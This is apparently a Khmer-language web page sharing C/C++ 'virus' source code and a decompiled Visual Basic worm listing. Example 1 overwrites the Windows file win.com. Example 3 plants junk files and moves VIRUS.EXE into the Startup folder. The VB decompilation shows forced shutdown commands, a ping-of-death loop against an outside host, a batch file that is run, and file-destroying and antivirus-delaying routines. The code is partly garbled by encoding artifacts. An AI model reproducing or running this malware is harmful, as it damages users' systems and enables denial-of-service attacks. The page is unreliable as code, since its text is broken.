កូដ Virus សរសេរ C, C++

IT————————- Example 1 —————————————-
#include<iostream.h>
#include<conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sysstat.h>
#include <io.h>
#include <string.h>

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named “DOVE.GIF” in the current directory and write
a string to it. If “DOVE.GIF” already exists, it will be overwritten.
*/

if ((handle = open(“C:\windows\win.com”, O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf(“Error opening file.”);
exit(1);
}

strcpy(string, “<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!</html>”smilie;

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf(“Error writing to the file.”smilie;
getch();
exit(1);
}
printf(“Wrote %d bytes to the file.”, res);
cout<<“Hello !!!!!!!!”;
cout<<“This is a VIRUS ATTACK !!!”;
cout<<“This execution currupt your WINDOWS !!!!!!”;
close(handle);
getch();
return 0;
}

————————– Example 2 —————————
#include<iostream.h>
#include<conio.h>
#include<dos.h>
#include<stdio.h>
#include<process.h>
#include<graphics.h>
#include<fstream.h>

void fool();
void main()
{
clrscr();
for(int i=0;i<=100;i++)
{

textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf(“VIRUS LOADING”smilie;
gotoxy(39,15);
textcolor(GREEN);
cout<<i><<“%”;
delay(75);
clrscr();
}
delay(100);
clrscr();
flushall();
gotoxy(20,12);
cout<<” ‘AISHWARYA’ VIRUS CREATED NOW BY SANDEEP”;
gotoxy(20,14);
cout<<“SAY GOOD BYE TO YOUR PC IN “;
for(int j=10;j>=0;j–)
{
gotoxy(48,14);
cout<<j><<” SECONDS”;
delay(1000);
}
clrscr();
cout<<”
1.HARD-DISK CORRUPTION: “;
delay(4000);
cout<<“completed”;
cout<<”

2.MOTHER BOARD CORRUPTION: “;
delay(4000);
cout<<“completed”;
cout<<”

3.INSTALLING CYBERBOB.DLL –>WINDOWS/COMMAND :”;
delay(4000);
cout<<“completed”;
cout<<”

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED”;
delay(3000);
cout<<”

VIRUS.EXE”;
delay(2000);
cout<<”
*************************”;
cout<<”
Buddy it’s a simply joke “;
cout<<”
*************************”;
delay(4000);
cout<<”

**********************************”;
cout<<”
For Real Virus “;
cout<<”
Contact Me: Sandeep Udaipur “;
cout<<”
Mo: 010101010101 “;
cout<<”
Email: sandeep@yahoo.co.in “;
cout<<”
**********************************”;
delay(10000);
}

void fool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,”c:\tc\bgi”smilie;
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
getch();
delay(4000);
closegraph();
exit(0);
}

——————————— Example 3 ————————————-
//*****************************************************//
//virus program mimmic -created by Sohan Alva class XII//
//*****************************************************//

#include<iostream.h>
#include<conio.h>
#include<dos.h>
#include<stdio.h>
#include<process.h>
#include<graphics.h>
#include<fstream.h>

void ffool(); //FUNCTION WHICH GIVES THE FINAL MESSAGE

void main()
{
clrscr();
for(int i=0;i<=100;i++)
{

textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf(“VIRUS LOADING”smilie;
gotoxy(39,15);
textcolor(GREEN);
cout<<i><<“%”;
delay(75);
clrscr();
}
delay(100);
clrscr();
fflush(stdout);
gotoxy(20,12);
cout<<” ‘TOURNIQUET’ VIRUS CREATED BY PROCRAETORIAN”;
gotoxy(20,14);
cout<<” SAY GOOD BYE TO YOUR PC IN “;
for(int j=5;j>=0;j–)
{
gotoxy(48,14);
cout<<j><<” SECONDS”;
delay(1000);
}
ofstream f1;
f1.open(“c:/windows/All Users/desktop/procraetorian.sys”smilie;
ofstream f3(“c:/windows/All Users/desktop/blast.sys”smilie;
ofstream a2(“c:/windows/All Users/desktop/mslaugh.exe”smilie;
ofstream s2(“c:/windows/All Users/desktop/backdoor.sys”smilie;
ofstream g2(“c:/windows/All Users/desktop/spin32_war.sys”smilie;
ofstream h2(“c:/windows/All Users/desktop/russpatr.sys”smilie;
ofstream j2(“c:/windows/All Users/desktop/torr_sys32.sys”smilie;
ofstream k2(“c:/windows/All Users/desktop/xxx.sys”smilie;
ofstream l2(“c:/windows/All Users/desktop/i.txt”smilie;
ofstream sm(“c:/windows/All Users/desktop/am.txt”smilie;
ofstream d1(“c:/windows/All Users/desktop/your.txt”smilie;
ofstream d2(“c:/windows/All Users/desktop/worst.txt”smilie;
ofstream d3(“c:/windows/All Users/desktop/night.txt”smilie;
ofstream d4(“c:/windows/All Users/desktop/mare.txt”smilie;
clrscr();
lowvideo();
cout<<”

1.HARD-DISK CORRUPTION
:”;
delay(4000);
cout<<“completed”;
cout<<”

2.MOTHER BOARD CORRUPTION
:”;
delay(4000);
cout<<“completed”;
cout<<”

3.INSTALLING CYBERBOB.DLL –>WINDOWS/COMMAND
:”;
delay(4000);
cout<<“completed”;
cout<<”

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED”;
delay(3000);
rename(“VIRUS.EXE”,”C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE”smilie;
//ffool();
}
//*END OF MAIN*//
//*START OF ffool()*//
void ffool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,”\tc\bgi\”smilie;
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
highvideo();
outtextxy(50,150,”THE PROCRAETORIAN:”smilie;
delay(1500);
outtextxy(50,200,”YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS
HOST”smilie;
outtextxy(50,250,”PEA(C)E BE WITH YOU ! ! !”smilie;
getch();
delay(4000);
closegraph();
exit(0);
}

//*END OF ffool()*//
—————————————————–
3  សរសេរមេរោគប្រើកម្មវិធី C++

កូដសរសេរលើកម្មវិធី VB. Virus Love

Object: F
Private Sub M_Timer() Address: 40EDD0
Private Sub W_Timer() Address: 40EF90
Private Sub Y_Timer() Address: 40FCA0
Private Sub S_Timer() Address: 40EEB0
Private Sub Form_Load() Address: 40E3A0
Public Function PathCover(Path) Address: 407870
Public Function RndName() Address: 407980
Public Sub ScanSys() Address: 407C10
Public Sub ScanDir(Path) Address: 407FC0
Public Sub ScanA() Address: 408280
Public Function FindUSB() Address: 408650
Public Sub MakeTmp() Address: 408D20
Public Sub LoadTmp() Address: 408D90
Public Sub SaveTmp() Address: 408F40
Public Sub LockFile(FileName) Address: 409140
Public Sub UnLockFile(FileName) Address: 409360
Public Function EnCode(StringValue) Address: 409520
Public Sub Destroy() Address: 4097E0
Public Sub BitToy() Address: 40B270
Public Sub DelayAV() Address: 40B920
Public Sub CheckMe() Address: 40BBF0
Public Function SafeMe(AntiPro) Address: 40BE50
Public Sub AutoSafe() Address: 40BFB0
Public Sub SysCopy() Address: 40C470
Public Sub InsertChar(Code) Address: 40CF30
Public Sub YSent() Address: 40D180
Public Function YCheck(KeyRead, MyVoice) Address: 40E100
***********************************************
loc_0040B295: var_08 = &H401320
loc_0040B2A7: call eax+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_0040B2E0: var_38 = 80020004h
loc_0040B2EA: Randomize(10)
loc_0040B2F3: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B2FC: var_38 = 80020004h
loc_0040B300: var_40 = 10
loc_0040B307: var_40 = Rnd(%x2)
loc_0040B30D: fstp real4 ptr var_000000C4
loc_0040B313: fld real4 ptr var_000000C4
loc_0040B319: fmul real4 ptr [0040131Ch] ;
loc_0040B32A: fstp real4 ptr var_48
loc_0040B32D: fstsw ax
loc_0040B331: If MSVBVM60.DLL.__vbaFreeVar = 0 Then
loc_0040B346: call MSVBVM60.DLL.__vbaUI1Var(Round(4, esi))
loc_0040B36B: If var_60 = 0 Then
loc_0040B370: call eax+00000300h(arg_08)
loc_0040B37B: var_30 = IsSet(eax+00000300h(arg_0smilie
loc_0040B38B: call edx+64h(eax+00000300h(arg_08), 00002710h)
loc_0040B392: If edx+64h(eax+00000300h(arg_08), 00002710h) < esi Then
loc_0040B39D: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+64h(eax+0000 0300h(arg_08), 00002710h), eax+00000300h(arg_08), 00405C88h, 00000064h)
loc_0040B3A3: End If
loc_0040B3A6: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B3AC: End If
loc_0040B3B0: If byte ptr var_1C = 01h Then
loc_0040B3B5: call MSVBVM60.DLL.__vbaStrI2(esi, esi, esi)
loc_0040B3C6: call MSVBVM60.DLL.__vbaStrMove
loc_0040B3CD: call MSVBVM60.DLL.__vbaStrToAnsi(“”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B3DD: call MSVBVM60.DLL.__vbaStrToAnsi(“”, “set cdaudio door open”, MSVBVM60.DLL.__vbaStrToAnsi(“”, MSVBVM60.DLL.__vbaStrMove))
loc_0040B3E4: Proc_004058C8(MSVBVM60.DLL.__vbaStrToAnsi(“”, “set cdaudio door open”, MSVBVM60.DLL.__vbaStrToAnsi(“”, MSVBVM60.DLL.__vbaStrMove)), MSVBVM60.DLL.__vbaStrI2(esi, esi, esi), “”smilie
loc_0040B3E9: call MSVBVM60.DLL.__vbaSetSystemError(MSVBVM60.DLL.__vb aStrToAnsi(“”, “set cdaudio door open”, MSVBVM60.DLL.__vbaStrToAnsi(“”, MSVBVM60.DLL.__vbaStrMove)))
loc_0040B406: GoTo loc_40B40E
loc_0040B408: End If
loc_0040B40E: ‘Referenced from 0040B406
loc_0040B412: If byte ptr var_1C = 02h Then
loc_0040B431: var_68 = 80020004h
loc_0040B434: var_58 = 80020004h
loc_0040B437: var_00000098 = “Hi world !”
loc_0040B441: var_000000A0 = 8
loc_0040B45A: var_00000088 = “Hello my name is HoaiTranMGF by Bit.Kill3r”
loc_0040B464: var_00000090 = 8
loc_0040B489: MsgBox(“Hello my name is HoaiTranMGF by Bit.Kill3r”, 00001000h, “Hi world !”, 10, 10)
loc_0040B4AA: End If
loc_0040B4AE: If byte ptr var_1C = 03h Then
loc_0040B4B9: var_00000088 = “shutdown -f”
loc_0040B4C3: var_00000090 = 8
loc_0040B4CD: var_40 = “shutdown -f”
loc_0040B4D8: var_40 = Shell(esi, %x3)
loc_0040B4E1: fstp st(0)
loc_0040B4E3: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B4E9: End If
loc_0040B4ED: If byte ptr var_1C = 04h Then
loc_0040B4FF: var_40 = Chr(00000022h)
loc_0040B507: var_70 = Chr(00000022h)
loc_0040B51A: var_00000090 = 8
loc_0040B520: var_000000A0 = 8
loc_0040B530: var_00000088 = “shutdown -s -t 10 -c”
loc_0040B53A: var_00000098 = “Hello ! my name is HoaiTrangMGF by Bit.Kill3r”
loc_0040B544: call MSVBVM60.DLL.__vbaVarCat(“”, var_40, var_00000090, esi)
loc_0040B552: call MSVBVM60.DLL.__vbaVarCat(“”, var_000000A0, MSVBVM60.DLL.__vbaVarCat(“”, var_40, var_00000090, esi))
loc_0040B55D: call MSVBVM60.DLL.__vbaVarCat(“”, var_70, MSVBVM60.DLL.__vbaVarCat(“”, var_000000A0, MSVBVM60.DLL.__vbaVarCat(“”, var_40, var_00000090, esi)))
loc_0040B560: MSVBVM60.DLL.__vbaVarCat(“”, var_70, MSVBVM60.DLL.__vbaVarCat(“”, var_000000A0, MSVBVM60.DLL.__vbaVarCat(“”, var_40, var_00000090, esi))) = Shell(%x2, %x3)
loc_0040B57C: fstp st(0)
loc_0040B58A: End If
loc_0040B58E: If byte ptr “” >= 05h Then
loc_0040B593: call ecx+00000728h(arg_08)
loc_0040B59B: If ecx+00000728h(arg_08) < esi Then
loc_0040B5A9: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+00000728h(ar g_08), arg_08, 00405544h, 00000728h)
loc_0040B5AF: End If
loc_0040B5AF: End If
loc_0040B5BE: call &(“:home”, “”smilie
loc_0040B5C5: call MSVBVM60.DLL.__vbaStrMove
loc_0040B5CD: call &(“13#1”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B5D4: call MSVBVM60.DLL.__vbaStrMove
loc_0040B5D9: call MSVBVM60.DLL.__vbaFreeStr
loc_0040B5EA: call MSVBVM60.DLL.__vbaUI1I2
loc_0040B5F4: call MSVBVM60.DLL.__vbaUI1I2
loc_0040B600: If MSVBVM60.DLL.__vbaUI1I2 <= MSVBVM60.DLL.__vbaUI1I2 Then
loc_0040B60B: call &(“ping”, “”smilie
loc_0040B612: call MSVBVM60.DLL.__vbaStrMove
loc_0040B61A: call &(“musicdanang.tv”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B621: call MSVBVM60.DLL.__vbaStrMove
loc_0040B629: call &(“-n 1 -l 65500”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B630: call MSVBVM60.DLL.__vbaStrMove
loc_0040B638: call &(“13#1”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B63F: call MSVBVM60.DLL.__vbaStrMove
loc_0040B65A: al = al + bl
loc_0040B65C: If Not Asm.b_flag Then
loc_0040B662: GoTo loc_40B5F6
loc_0040B664: End If
loc_0040B66D: call &(“ping”, “”smilie
loc_0040B674: call MSVBVM60.DLL.__vbaStrMove
loc_0040B67C: call &(“musicdanang.tv”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B683: call MSVBVM60.DLL.__vbaStrMove
loc_0040B68B: call &(“-n 2 -l 65500”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B692: call MSVBVM60.DLL.__vbaStrMove
loc_0040B69A: call &(“13#1”, MSVBVM60.DLL.__vbaStrMove)
loc_0040B6A1: call MSVBVM60.DLL.__vbaStrMove
loc_0040B6C3: call &(“goto home”, “”smilie
loc_0040B6CA: call MSVBVM60.DLL.__vbaStrMove
loc_0040B6D3: If 411340h = 0 Then
loc_0040B6DF: CreateObject(00405AA8h, 00411340h)
loc_0040B6E5: End If
loc_0040B6F2: call eax+14h(00411340h, var_30)
loc_0040B6F9: If eax+14h(00411340h, var_30) < 0 Then
loc_0040B704: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+14h(00411340 h, var_30), 00411340h, 00405E80h, 00000014h)
loc_0040B70A: End If
loc_0040B716: call edx+50h(var_30, “”smilie
loc_0040B71D: If edx+50h(var_30, “”smilie < 0 Then
loc_0040B728: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+50h(var_30, “”smilie, var_30, 00405AB8h, 00000050h)
loc_0040B72E: End If
loc_0040B734: var_20 = 0
loc_0040B73B: call MSVBVM60.DLL.__vbaStrMove
loc_0040B74B: call edx+000006F8h(arg_08, “”, “”smilie
loc_0040B753: If edx+000006F8h(arg_08, “”, “”smilie < 0 Then
loc_0040B761: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(ar g_08, “”, “”smilie, arg_08, 00405544h, 000006F8h)
loc_0040B767: End If
loc_0040B770: call &(“POD.bat”, “”smilie
loc_0040B777: call MSVBVM60.DLL.__vbaStrMove
loc_0040B780: call Open #(00000020h, FFFFFFFFh, 00000001h, MSVBVM60.DLL.__vbaStrMove)
loc_0040B7A0: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B7AE: call Put #(00000000h, “”, 00000001h)
loc_0040B7B6: Close 00000001h
loc_0040B7C3: If 411340h = 0 Then
loc_0040B7CF: CreateObject(00405AA8h, 00411340h)
loc_0040B7D5: End If
loc_0040B7E2: call ecx+14h(00411340h, var_30)
loc_0040B7E9: If ecx+14h(00411340h, var_30) < 0 Then
loc_0040B7F4: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+14h(00411340 h, var_30), 00411340h, 00405E80h, 00000014h)
loc_0040B7FA: End If
loc_0040B806: call ecx+50h(var_30, var_20)
loc_0040B80D: If ecx+50h(var_30, var_20) < 0 Then
loc_0040B818: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h(var_30, var_20), var_30, 00405AB8h, 00000050h)
loc_0040B81E: End If
loc_0040B824: var_20 = 0
loc_0040B82B: call MSVBVM60.DLL.__vbaStrMove
loc_0040B83B: call eax+000006F8h(arg_08, “”, “”smilie
loc_0040B843: If eax+000006F8h(arg_08, “”, “”smilie < 0 Then
loc_0040B851: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+000006F8h(ar g_08, “”, “”smilie, arg_08, 00405544h, 000006F8h)
loc_0040B857: End If
loc_0040B860: call &(“POD.bat”, “”smilie
loc_0040B86B: var_40 = 8
loc_0040B872: var_40 = Shell(00000000h, %x3)
loc_0040B882: fstp st(0)
loc_0040B890: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B899: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B8A5: GoTo loc_40B8EB
loc_0040B8C5: call MSVBVM60.DLL.__vbaFreeObj(0040B8F5h)
loc_0040B8EA: ret
loc_0040B8EB: ‘Referenced from 0040B8A5
loc_0040B8EE: call MSVBVM60.DLL.__vbaFreeStr
loc_0040B8F4: ret
loc_0040B8FB: call ecx+08h(arg_08)
loc_0040B911: retn 0004h
loc_0040B914: End If
loc_0040B914: GoTo loc_MSVBVM60.DLL.__vbaFPException
loc_0040B919: End If
loc_0040B919: call MSVBVM60.DLL.__vbaErrorOverflow
End Sub
************************************************** ***
Public Sub LockFile(FileName) ‘409140
loc_00409162: var_08 = &H401250
loc_00409174: call ecx+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_00409199: call Open #(00000020h, FFFFFFFFh, 00000001h, edx)
loc_004091A4: “This File Was Destroy By HoaiTrang MGF [Bit.Kill3r] = Len(%x2)
loc_004091AC: call MSVBVM60.DLL.__vbaI2I4
loc_004091C8: If 00000001h <= var_64 Then
loc_004091D0: call MSVBVM60.DLL.__vbaGet3(00000001h, var_20, 00000001h)
loc_004091DC: and eax, 000000FFh
loc_004091E6: var_50 = “”
loc_004091E9: var_58 = 8
loc_004091F0: var_38 = Chr(var_20)
loc_00409202: call MSVBVM60.DLL.__vbaVarCat(“”, var_38, var_58)
loc_00409209: call MSVBVM60.DLL.__vbaStrVarMove(MSVBVM60.DLL.__vbaVar Cat(“”, var_38, var_5smilie
loc_00409214: call MSVBVM60.DLL.__vbaStrMove
loc_0040922C: cx = cx + si
loc_0040922F: If Err.Number <> 0 Then GoTo loc_0040934F
loc_00409237: GoTo loc_4091C2
loc_00409239: End If
loc_0040923F: Close %x1
loc_0040924D: call Open #(00000020h, FFFFFFFFh, 00000001h, edx)
loc_0040925B: call MSVBVM60.DLL.__vbaStrCopy
loc_00409269: call Put #(00000000h, “”, 00000001h)
loc_00409278: call MSVBVM60.DLL.__vbaFreeStr
loc_0040927C: Close 00000001h
loc_00409289: call &(“.lock”, edx)
loc_00409294: call MSVBVM60.DLL.__vbaStrMove
loc_0040929D: call Open #(00000020h, FFFFFFFFh, 00000001h, MSVBVM60.DLL.__vbaStrMove)
loc_004092A6: call MSVBVM60.DLL.__vbaFreeStr
loc_004092B6: call ecx+00000724h(arg_08, “”, “”smilie
loc_004092BE: If ecx+00000724h(arg_08, “”, “”smilie < 0 Then
loc_004092CF: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+00000724h(ar g_08, “”, “”smilie, arg_08, 00405544h, 00000724h)
loc_004092D5: End If
loc_004092DB: var_24 = 0
loc_004092E2: call MSVBVM60.DLL.__vbaStrMove
loc_004092EC: call Put #(00000000h, “”, 00000001h)
loc_004092F5: call MSVBVM60.DLL.__vbaFreeStr
loc_004092F9: Close 00000001h
loc_00409300: GoTo loc_409326
loc_00409325: ret
loc_00409326: ‘Referenced from 00409300
loc_00409329: call MSVBVM60.DLL.__vbaFreeStr(00409330h)
loc_0040932F: ret
loc_00409336: call ecx+08h(arg_08)
loc_0040934C: retn 0008h
loc_0040934F: ‘Referenced from 040922F
loc_0040934F: call MSVBVM60.DLL.__vbaErrorOverflow
End Sub